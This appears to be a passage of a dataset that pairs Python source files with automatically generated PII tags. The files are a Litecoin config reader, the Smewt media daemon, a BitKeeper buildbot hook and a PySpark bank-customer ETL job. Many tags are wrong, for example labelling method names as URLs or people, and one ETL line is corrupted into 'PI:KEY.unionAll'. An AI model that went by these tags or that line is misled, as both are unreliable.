'split_on='], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'end year'], ['PERSON', 'geopandas'], ['PERSON', 'geopandas'], ['PERSON', 'os.chdir'], ['DATE_TIME', '1916'], ['DATE_TIME', '2000'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'glob'], ['URL', 'np.as'], ['URL', 'np.as'], ['URL', 'Affine.tr'], ['URL', 'Affine.sc'], ['URL', 'np.na'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'os.path.ba'], ['URL', 'df.so'], ['URL', 'sorted.fn.to'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'df.ye'], ['URL', 'df.ye'], ['URL', 'slice.fn.to'], ['URL', 'rst.bo'], ['URL', 'rst.re'], ['URL', 'np.ma.ma'], ['URL', 'rst.re'], ['URL', 'np.me'], ['URL', 'matplotlib.us'], ['URL', 'pathos.mp'], ['URL', 'os.ch'], ['URL', 'StudyArea.sh'], ['URL', 'gpd.re'], ['URL', 'shp.bo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'df.in'], ['URL', 'df.ro'], ['URL', 'df.pl'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'os.ma'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'plt.sa'], ['URL', 'plt.cl'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'np.ar'], ['URL', 'np.ar']]" +92,"# Copyright (c) 2010 Witchspace dummy@email.com +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +# THE SOFTWARE. +"""""" +Utilities for reading litecoin configuration files. +"""""" + + +def read_config_file(filename): + """""" + Read a simple ``'='``-delimited config file. + Raises :const:`IOError` if unable to open file, or :const:`ValueError` + if an parse error occurs. + """""" + f = open(filename) + try: + cfg = {} + for line in f: + line = line.strip() + if line and not line.startswith(""#""): + try: + (key, value) = line.split('=', 1) + cfg[key] = value + except ValueError: + pass # Happens when line has no '=', ignore + finally: + f.close() + return cfg + + +def read_default_config(filename=None): + """""" + Read litecoin default configuration from the current user's home directory. + + Arguments: + + - `filename`: Path to a configuration file in a non-standard location (optional) + """""" + if filename is None: + import os + import platform + home = os.getenv(""HOME"") + if not home: + raise IOError(""Home directory not defined, don't know where to look for config file"") + + if platform.system() == ""Darwin"": + location = 'Library/Application Support/Litecoin/litecoin.conf' + else: + location = '.litecoin/litecoin.conf' + filename = os.path.join(home, location) + + elif filename.startswith(""~""): + import os + filename = os.path.expanduser(filename) + + try: + return read_config_file(filename) + except (IOError, ValueError): + pass # Cannot read config file, ignore +",2706,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['LOCATION', 'Witchspace'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['PERSON', 'platform.system'], ['PERSON', 'Darwin'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'f.cl'], ['URL', 'os.ge'], ['URL', 'platform.sy'], ['URL', 'litecoin.co'], ['URL', 'litecoin.co'], ['URL', 'os.path.jo'], ['URL', 'filename.st'], ['URL', 'os.pa']]" +93,"#!/usr/bin/env python +# -*- coding: utf-8 -*- +# +# Smewt - A smart collection manager +# Copyright (c) 2010 Nicolas Wack dummy@email.com +# +# Smewt is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 3 of the License, or +# (at your option) any later version. +# +# Smewt is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +# + +from pygoo import MemoryObjectGraph, Equal, ontology +from guessit.slogging import setupLogging +from smewt import config +from smewt.ontology import Episode, Movie, Subtitle, Media, Config +from smewt.base import cache, utils, Collection +from smewt.base.taskmanager import TaskManager, FuncTask +from smewt.taggers import EpisodeTagger, MovieTagger +from smewt.plugins.feedwatcher import FeedWatcher +from threading import Timer +import smewt +import time +import os +import logging + +log = logging.getLogger(__name__) + + +class VersionedMediaGraph(MemoryObjectGraph): + + def __init__(self, *args, **kwargs): + super(VersionedMediaGraph, self).__init__(*args, **kwargs) + + + def add_object(self, node, recurse = Equal.OnIdentity, excluded_deps = list()): + result = super(VersionedMediaGraph, self).add_object(node, recurse, excluded_deps) + if isinstance(result, Media): + result.lastModified = time.time() + + return result + + def clear_keep_config(self): + # we want to keep our config object untouched + tmp = MemoryObjectGraph() + tmp.add_object(self.config) + super(VersionedMediaGraph, self).clear() + self.add_object(tmp.find_one(Config)) + + def __getattr__(self, name): + # if attr is not found and starts with an upper case letter, it might be the name + # of one of the registered classes. In that case, return a function that would instantiate + # such an object in this graph + if name[0].isupper() and name in ontology.class_names(): + def inst(basenode = None, **kwargs): + result = super(VersionedMediaGraph, self).__getattr__(name)(basenode, **kwargs) + if isinstance(result, Media): + result.lastModified = time.time() + return result + + return inst + + raise AttributeError, name + + + @property + def config(self): + try: + return self.find_one(Config) + except ValueError: + return self.Config() + + +class SmewtDaemon(object): + def __init__(self): + super(SmewtDaemon, self).__init__() + + # Note: put log file in data dir instead of log dir so that it is + # accessible through the user/ folder static view + self.logfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.log') + setupLogging(filename=self.logfile, with_time=True, with_thread=True) + + + if smewt.config.PERSISTENT_CACHE: + self.loadCache() + + # get a TaskManager for all the import tasks + self.taskManager = TaskManager() + + # get our main graph DB + self.loadDB() + + # get our collections: series and movies for now + self.episodeCollection = Collection(name = 'Series', + # import episodes and their subtitles too + validFiles = [ Episode.isValidEpisode, + Subtitle.isValidSubtitle ], + mediaTagger = EpisodeTagger, + dataGraph = self.database, + taskManager = self.taskManager) + + + self.movieCollection = Collection(name = 'Movie', + # import movies and their subtitles too + validFiles = [ Movie.isValidMovie, + Subtitle.isValidSubtitle ], + mediaTagger = MovieTagger, + dataGraph = self.database, + taskManager = self.taskManager) + + + if config.REGENERATE_THUMBNAILS: + # launch the regeneration of the thumbnails, but only after everything + # is setup and we are able to serve requests + Timer(3, self.regenerateSpeedDialThumbnails).start() + + if self.database.config.get('tvuMldonkeyPlugin'): + # load up the feed watcher + self.feedWatcher = FeedWatcher(self) + + # FIXME: this should go into a plugin.init() method + from smewt.plugins import mldonkey + mldonkey.send_command('vm') + + + # do not rescan as it would be too long and we might delete some files that + # are on an unaccessible network share or an external HDD + self.taskManager.add(FuncTask('Update collections', self.updateCollections)) + + + + def quit(self): + log.info('SmewtDaemon quitting...') + self.taskManager.finishNow() + try: + self.feedWatcher.quit() + except AttributeError: + pass + + self.saveDB() + + if smewt.config.PERSISTENT_CACHE: + self.saveCache() + + log.info('SmewtDaemon quitting OK!') + + + def _cacheFilename(self): + return utils.path(smewt.dirs.user_cache_dir, 'Smewt.cache', + createdir=True) + + def loadCache(self): + cache.load(self._cacheFilename()) + + def saveCache(self): + cache.save(self._cacheFilename()) + + def clearCache(self): + cache.clear() + cacheFile = self._cacheFilename() + log.info('Deleting cache file: %s' % cacheFile) + try: + os.remove(cacheFile) + except OSError: + pass + + + def loadDB(self): + dbfile = smewt.settings.get('database_file') + if not dbfile: + dbfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.database', + createdir=True) + smewt.settings.set('database_file', dbfile) + + log.info('Loading database from: %s', dbfile) + self.database = VersionedMediaGraph() + try: + self.database.load(dbfile) + except: + log.warning('Could not load database %s', dbfile) + + def saveDB(self): + dbfile = smewt.settings.get('database_file') + log.info('Saving database to %s', dbfile) + self.database.save(dbfile) + + def clearDB(self): + log.info('Clearing database...') + self.database.clear_keep_config() + self.database.save(smewt.settings.get('database_file')) + + + def updateCollections(self): + self.episodeCollection.update() + self.movieCollection.update() + + def rescanCollections(self): + self.episodeCollection.rescan() + self.movieCollection.rescan() + + + def _regenerateSpeedDialThumbnails(self): + import shlex, subprocess + from PIL import Image + from StringIO import StringIO + webkit2png = (subprocess.call(['which', 'webkit2png'], stdout=subprocess.PIPE) == 0) + if not webkit2png: + log.warning('webkit2png not found. please run: ""python setup.py install"" from within the 3rdparty/webkit2png folder') + return + + def gen(path, filename): + width, height = 200, 150 + log.info('Creating %dx%d screenshot for %s...' % (width, height, path)) + filename = utils.path(smewt.dirs.user_data_dir, 'speeddial', filename, createdir=True) + cmd = 'webkit2png -g 1000 600 ""http://localhost:6543%s""' % path + screenshot, _ = subprocess.Popen(shlex.split(cmd), + stdout=subprocess.PIPE).communicate() + im = Image.open(StringIO(screenshot)) + im.thumbnail((width, height), Image.ANTIALIAS) + im.save(filename, ""PNG"") + + gen('/movies', 'allmovies.png') + gen('/movies/table', 'moviestable.png') + gen('/movies/recent', 'recentmovies.png') + gen('/series', 'allseries.png') + gen('/series/suggestions', 'episodesuggestions.png') + gen('/feeds', 'feeds.png') + + def regenerateSpeedDialThumbnails(self): + self.taskManager.add(FuncTask('Regenerate thumbnails', + self._regenerateSpeedDialThumbnails)) +",8704,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Nicolas Wack'], ['LOCATION', 'self).__getattr__(name)(basenode'], ['PERSON', 'Smewt.log'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = EpisodeTagger'], ['NRP', 'dataGraph'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = MovieTagger'], ['PERSON', 'self.taskManager.finishNow'], ['PERSON', 'self.saveCache'], ['PERSON', 'self.database = VersionedMediaGraph'], ['PERSON', 'utils.path(smewt.dirs.user_data_dir'], ['LOCATION', 'Image'], ['PERSON', ""self.taskManager.add(FuncTask('Regenerate""], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'guessit.sl'], ['URL', 'smewt.ba'], ['URL', 'smewt.ba'], ['URL', 'smewt.pl'], ['URL', 'logging.ge'], ['URL', 'result.la'], ['URL', 'tmp.ad'], ['URL', 'self.co'], ['URL', 'self.ad'], ['URL', 'tmp.fi'], ['URL', 'ontology.cl'], ['URL', 'result.la'], ['URL', 'self.fi'], ['URL', 'self.Co'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.config.PE'], ['URL', 'Episode.is'], ['URL', 'Subtitle.is'], ['URL', 'self.mo'], ['URL', 'Movie.is'], ['URL', 'Subtitle.is'], ['URL', 'config.RE'], ['URL', 'self.re'], ['URL', 'self.database.config.ge'], ['URL', 'plugin.in'], ['URL', 'smewt.pl'], ['URL', 'mldonkey.se'], ['URL', 'self.taskManager.ad'], ['URL', 'log.in'], ['URL', 'self.taskManager.fi'], ['URL', 'self.sa'], ['URL', 'smewt.config.PE'], ['URL', 'self.sa'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'Smewt.ca'], ['URL', 'cache.sa'], ['URL', 'cache.cl'], ['URL', 'log.in'], ['URL', 'os.re'], ['URL', 'smewt.settings.ge'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.settings.se'], ['URL', 'log.in'], ['URL', 'smewt.settings.ge'], ['URL', 'log.in'], ['URL', 'self.database.sa'], ['URL', 'log.in'], ['URL', 'self.database.cl'], ['URL', 'self.database.sa'], ['URL', 'smewt.settings.ge'], ['URL', 'self.mo'], ['URL', 'self.episodeCollection.re'], ['URL', 'self.movieCollection.re'], ['URL', 'subprocess.ca'], ['URL', 'setup.py'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'im.th'], ['URL', 'Image.AN'], ['URL', 'im.sa'], ['URL', 'allmovies.pn'], ['URL', 'moviestable.pn'], ['URL', 'recentmovies.pn'], ['URL', 'allseries.pn'], ['URL', 'episodesuggestions.pn'], ['URL', 'feeds.pn'], ['URL', 'self.taskManager.ad']]" +94,"#!/usr/local/bin/python +# +# BitKeeper hook script. +# +# svn_buildbot.py was used as a base for this file, if you find any bugs or +# errors please email me. +# +# Amar Takhar dummy@email.com + + +''' +/path/to/bk_buildbot.py --repository ""$REPOS"" --revision ""$REV"" --branch \ +"""" --bbserver localhost --bbport 9989 +''' + +import commands +import sys +import os +import re +if sys.version_info < (2, 6): + import sets + +# We have hackish ""-d"" handling here rather than in the Options +# subclass below because a common error will be to not have twisted in +# PYTHONPATH; we want to be able to print that error to the log if +# debug mode is on, so we set it up before the imports. + +DEBUG = None + +if '-d' in sys.argv: + i = sys.argv.index('-d') + DEBUG = sys.argv[i+1] + del sys.argv[i] + del sys.argv[i] + +if DEBUG: + f = open(DEBUG, 'a') + sys.stderr = f + sys.stdout = f + + +from twisted.internet import defer, reactor +from twisted.python import usage +from twisted.spread import pb +from twisted.cred import credentials + + +class Options(usage.Options): + optParameters = [ + ['repository', 'r', None, + ""The repository that was changed.""], + ['revision', 'v', None, + ""The revision that we want to examine (default: latest)""], + ['branch', 'b', None, + ""Name of the branch to insert into the branch field. (REQUIRED)""], + ['category', 'c', None, + ""Schedular category.""], + ['bbserver', 's', 'localhost', + ""The hostname of the server that buildbot is running on""], + ['bbport', 'p', 8007, + ""The port that buildbot is listening on""] + ] + optFlags = [ + ['dryrun', 'n', ""Do not actually send changes""], + ] + + def __init__(self): + usage.Options.__init__(self) + + def postOptions(self): + if self['repository'] is None: + raise usage.error(""You must pass --repository"") + +class ChangeSender: + + def getChanges(self, opts): + """"""Generate and stash a list of Change dictionaries, ready to be sent + to the buildmaster's PBChangeSource."""""" + + # first we extract information about the files that were changed + repo = opts['repository'] + print ""Repo:"", repo + rev_arg = '' + if opts['revision']: + rev_arg = '-r""%s""' % (opts['revision'], ) + changed = commands.getoutput(""bk changes -v %s -d':GFILE:\\n' '%s'"" % ( + rev_arg, repo)).split('\n') + + # Remove the first line, it's an info message you can't remove (annoying) + del changed[0] + + change_info = commands.getoutput(""bk changes %s -d':USER:\\n$each(:C:){(:C:)\\n}' '%s'"" % ( + rev_arg, repo)).split('\n') + + # Remove the first line, it's an info message you can't remove (annoying) + del change_info[0] + + who = change_info.pop(0) + branch = opts['branch'] + message = '\n'.join(change_info) + revision = opts.get('revision') + + changes = {'who': who, + 'branch': branch, + 'files': changed, + 'comments': message, + 'revision': revision} + + if opts.get('category'): + changes['category'] = opts.get('category') + + return changes + + + def sendChanges(self, opts, changes): + pbcf = pb.PBClientFactory() + reactor.connectTCP(opts['bbserver'], int(opts['bbport']), pbcf) + d = pbcf.login(credentials.UsernamePassword('change', 'changepw')) + d.addCallback(self.sendAllChanges, changes) + return d + + def sendAllChanges(self, remote, changes): + dl = remote.callRemote('addChange', changes) + return dl + + def run(self): + opts = Options() + try: + opts.parseOptions() + if not opts['branch']: + print ""You must supply a branch with -b or --branch."" + sys.exit(1); + + except usage.error, ue: + print opts + print ""%s: %s"" % (sys.argv[0], ue) + sys.exit() + + changes = self.getChanges(opts) + if opts['dryrun']: + for k in changes.keys(): + print ""[%10s]: %s"" % (k, changes[k]) + print ""*NOT* sending any changes"" + return + + d = self.sendChanges(opts, changes) + + def quit(*why): + print ""quitting! because"", why + reactor.stop() + + def failed(f): + print ""FAILURE: %s"" % f + reactor.stop() + + d.addErrback(failed) + d.addCallback(quit, ""SUCCESS"") + reactor.callLater(60, quit, ""TIMEOUT"") + + reactor.run() + + +if __name__ == '__main__': + s = ChangeSender() + s.run() +",4654,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Amar Takhar dummy@email.com'], ['LOCATION', 'sys.argv'], ['PERSON', 'buildbot'], ['PERSON', 'dryrun'], ['PERSON', 'buildmaster'], ['LOCATION', 'del changed[0]\n\n change_info'], ['PERSON', 'del change_info[0]\n\n '], ['PERSON', 'pbcf'], ['URL', 'buildbot.py'], ['URL', 'email.com'], ['URL', 'buildbot.py'], ['URL', 'sys.ve'], ['URL', 'sys.ar'], ['URL', 'sys.argv.in'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'twisted.int'], ['URL', 'twisted.py'], ['URL', 'twisted.cr'], ['URL', 'usage.er'], ['URL', 'commands.ge'], ['URL', 'commands.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'reactor.co'], ['URL', 'credentials.Us'], ['URL', 'd.ad'], ['URL', 'self.se'], ['URL', 'remote.ca'], ['URL', 'opts.pa'], ['URL', 'usage.er'], ['URL', 'sys.ar'], ['URL', 'self.ge'], ['URL', 'changes.ke'], ['URL', 'self.se'], ['URL', 'reactor.st'], ['URL', 'reactor.st'], ['URL', 'd.ad'], ['URL', 'd.ad'], ['URL', 'reactor.ca'], ['URL', 'reactor.ru'], ['URL', 's.ru']]" +95,"#coding=UTF-8 +from pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext +from pyspark.sql.types import * +from datetime import date, datetime, timedelta +import sys, re, os + +st = datetime.now() +conf = SparkConf().setAppName('PROC_O_LNA_XDXT_CUSTOMER_INFO').setMaster(sys.argv[2]) +sc = SparkContext(conf = conf) +sc.setLogLevel('WARN') +if len(sys.argv) > 5: + if sys.argv[5] == ""hive"": + sqlContext = HiveContext(sc) +else: + sqlContext = SQLContext(sc) +hdfs = sys.argv[3] +dbname = sys.argv[4] + +#处理需要使用的日期 +etl_date = sys.argv[1] +#etl日期 +V_DT = etl_date +#上一日日期 +V_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime(""%Y%m%d"") +#月初日期 +V_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime(""%Y%m%d"") +#上月末日期 +V_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime(""%Y%m%d"") +#10位日期 +V_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime(""%Y-%m-%d"") +V_STEP = 0 + +O_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/O_CI_XDXT_CUSTOMER_INFO/*') +O_CI_XDXT_CUSTOMER_INFO.registerTempTable(""O_CI_XDXT_CUSTOMER_INFO"") + +#任务[12] 001-01:: +V_STEP = V_STEP + 1 +#先删除原表所有数据 +ret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/*.parquet"") +#从昨天备表复制一份全量过来 +ret = os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet"") + + +F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*') +F_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"") + +sql = """""" + SELECT A.CUSTOMERID AS CUSTOMERID + ,A.CUSTOMERNAME AS CUSTOMERNAME + ,A.CUSTOMERTYPE AS CUSTOMERTYPE + ,A.CERTTYPE AS CERTTYPE + ,A.CERTID AS CERTID + ,A.CUSTOMERPASSWORD AS CUSTOMERPASSWORD + ,A.INPUTORGID AS INPUTORGID + ,A.INPUTUSERID AS INPUTUSERID + ,A.INPUTDATE AS INPUTDATE + ,A.REMARK AS REMARK + ,A.MFCUSTOMERID AS MFCUSTOMERID + ,A.STATUS AS STATUS + ,A.BELONGGROUPID AS BELONGGROUPID + ,A.CHANNEL AS CHANNEL + ,A.LOANCARDNO AS LOANCARDNO + ,A.CUSTOMERSCALE AS CUSTOMERSCALE + ,A.CORPORATEORGID AS CORPORATEORGID + ,A.REMEDYFLAG AS REMEDYFLAG + ,A.DRAWFLAG AS DRAWFLAG + ,A.MANAGERUSERID AS MANAGERUSERID + ,A.MANAGERORGID AS MANAGERORGID + ,A.DRAWELIGIBILITY AS DRAWELIGIBILITY + ,A.BLACKSHEETORNOT AS BLACKSHEETORNOT + ,A.CONFIRMORNOT AS CONFIRMORNOT + ,A.CLIENTCLASSN AS CLIENTCLASSN + ,A.CLIENTCLASSM AS CLIENTCLASSM + ,A.BUSINESSSTATE AS BUSINESSSTATE + ,A.MASTERBALANCE AS MASTERBALANCE + ,A.UPDATEDATE AS UPDATEDATE + ,A.FR_ID AS FR_ID + ,V_DT AS ODS_ST_DATE + ,'LNA' AS ODS_SYS_ID + FROM O_CI_XDXT_CUSTOMER_INFO A --客户基本信息 +"""""" + +sql = re.sub(r""\bV_DT\b"", ""'""+V_DT10+""'"", sql) +F_CI_XDXT_CUSTOMER_INFO_INNTMP1 = sqlContext.sql(sql) +F_CI_XDXT_CUSTOMER_INFO_INNTMP1.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO_INNTMP1"") + +#F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*') +#F_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"") +sql = """""" + SELECT DST.CUSTOMERID --客户编号:src.CUSTOMERID + ,DST.CUSTOMERNAME --客户名称:src.CUSTOMERNAME + ,DST.CUSTOMERTYPE --客户类型:src.CUSTOMERTYPE + ,DST.CERTTYPE --证件类型:src.CERTTYPE + ,DST.CERTID --证件号:src.CERTID + ,DST.CUSTOMERPASSWORD --客户口令:src.CUSTOMERPASSWORD + ,DST.INPUTORGID --登记机构:src.INPUTORGID + ,DST.INPUTUSERID --登记人:src.INPUTUSERID + ,DST.INPUTDATE --登记日期:src.INPUTDATE + ,DST.REMARK --备注:src.REMARK + ,DST.MFCUSTOMERID --核心客户号:src.MFCUSTOMERID + ,DST.STATUS --状态:src.STATUS + ,DST.BELONGGROUPID --所属关联集团代码:src.BELONGGROUPID + ,DST.CHANNEL --渠道:src.CHANNEL + ,DST.LOANCARDNO --贷款卡编号:src.LOANCARDNO + ,DST.CUSTOMERSCALE --客户规模:src.CUSTOMERSCALE + ,DST.CORPORATEORGID --法人机构号:src.CORPORATEORGID + ,DST.REMEDYFLAG --补登标志:src.REMEDYFLAG + ,DST.DRAWFLAG --领取标志:src.DRAWFLAG + ,DST.MANAGERUSERID --管户人:src.MANAGERUSERID + ,DST.MANAGERORGID --管户机构ID:src.MANAGERORGID + ,DST.DRAWELIGIBILITY --领取信息:src.DRAWELIGIBILITY + ,DST.BLACKSHEETORNOT --是否黑名当客户:src.BLACKSHEETORNOT + ,DST.CONFIRMORNOT --是否生效:src.CONFIRMORNOT + ,DST.CLIENTCLASSN --当前客户分类:src.CLIENTCLASSN + ,DST.CLIENTCLASSM --客户分类调整:src.CLIENTCLASSM + ,DST.BUSINESSSTATE --存量字段标志:src.BUSINESSSTATE + ,DST.MASTERBALANCE --单户余额:src.MASTERBALANCE + ,DST.UPDATEDATE --更新日期:src.UPDATEDATE + ,DST.FR_ID --法人代码:src.FR_ID + ,DST.ODS_ST_DATE --平台日期:src.ODS_ST_DATE + ,DST.ODS_SYS_ID --源系统代码:src.ODS_SYS_ID + FROM F_CI_XDXT_CUSTOMER_INFO DST + LEFT JOIN F_CI_XDXT_CUSTOMER_INFO_INNTMP1 SRC + ON SRC.CUSTOMERID = DST.CUSTOMERID + AND SRC.FR_ID = DST.FR_ID + WHERE SRC.CUSTOMERID IS NULL """""" + +sql = re.sub(r""\bV_DT\b"", ""'""+V_DT10+""'"", sql) +F_CI_XDXT_CUSTOMER_INFO_INNTMP2 = sqlContext.sql(sql) +dfn=""F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet"" +PI:KEY.unionAll(F_CI_XDXT_CUSTOMER_INFO_INNTMP1) +F_CI_XDXT_CUSTOMER_INFO_INNTMP1.cache() +F_CI_XDXT_CUSTOMER_INFO_INNTMP2.cache() +nrowsi = F_CI_XDXT_CUSTOMER_INFO_INNTMP1.count() +nrowsa = F_CI_XDXT_CUSTOMER_INFO_INNTMP2.count() +F_CI_XDXT_CUSTOMER_INFO_INNTMP2.write.save(path = hdfs + '/' + dfn, mode='overwrite') +F_CI_XDXT_CUSTOMER_INFO_INNTMP1.unpersist() +F_CI_XDXT_CUSTOMER_INFO_INNTMP2.unpersist() +et = datetime.now() +print(""Step %d start[%s] end[%s] use %d seconds, insert F_CI_XDXT_CUSTOMER_INFO lines %d, all lines %d"") % (V_STEP, st.strftime(""%H:%M:%S""), et.strftime(""%H:%M:%S""), (et-st).seconds, nrowsi, nrowsa) +ret = os.system(""hdfs dfs -mv /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/"") +#先删除备表当天数据 +ret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"") +#从当天原表复制一份全量到备表 +ret = os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"") +",7703,"[['LOCATION', '处理需要使用的日期'], ['LOCATION', '月初日期'], ['DATE_TIME', 'A.CERTTYPE'], ['LOCATION', 'A.CONFIRMORNOT'], ['PERSON', 'DST.BLACKSHEETORNOT'], ['PERSON', 'BLACKSHEETORNOT'], ['LOCATION', 'DST.CONFIRMORNOT'], ['NRP', 'DST.CLIENTCLASSN'], ['PERSON', 'nrowsa'], ['LOCATION', 'nrowsi'], ['LOCATION', 'nrowsa'], ['IP_ADDRESS', '01::\n'], ['URL', 'datetime.no'], ['URL', 'sys.ar'], ['URL', 'sc.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.RE'], ['URL', 'A.ST'], ['URL', 'A.BE'], ['URL', 'A.CH'], ['URL', 'A.CU'], ['URL', 'A.CO'], ['URL', 'A.RE'], ['URL', 'A.MA'], ['URL', 'A.MA'], ['URL', 'A.CO'], ['URL', 'A.CL'], ['URL', 'A.CL'], ['URL', 'A.MA'], ['URL', 'A.FR'], ['URL', 're.su'], ['URL', 'INNTMP1.re'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.ST'], ['URL', 'src.ST'], ['URL', 'DST.BE'], ['URL', 'src.BE'], ['URL', 'DST.CH'], ['URL', 'src.CH'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.FR'], ['URL', 'src.FR'], ['URL', 'SRC.CU'], ['URL', 'DST.CU'], ['URL', 'SRC.FR'], ['URL', 'DST.FR'], ['URL', 'SRC.CU'], ['URL', 're.su'], ['URL', 'INNTMP1.ca'], ['URL', 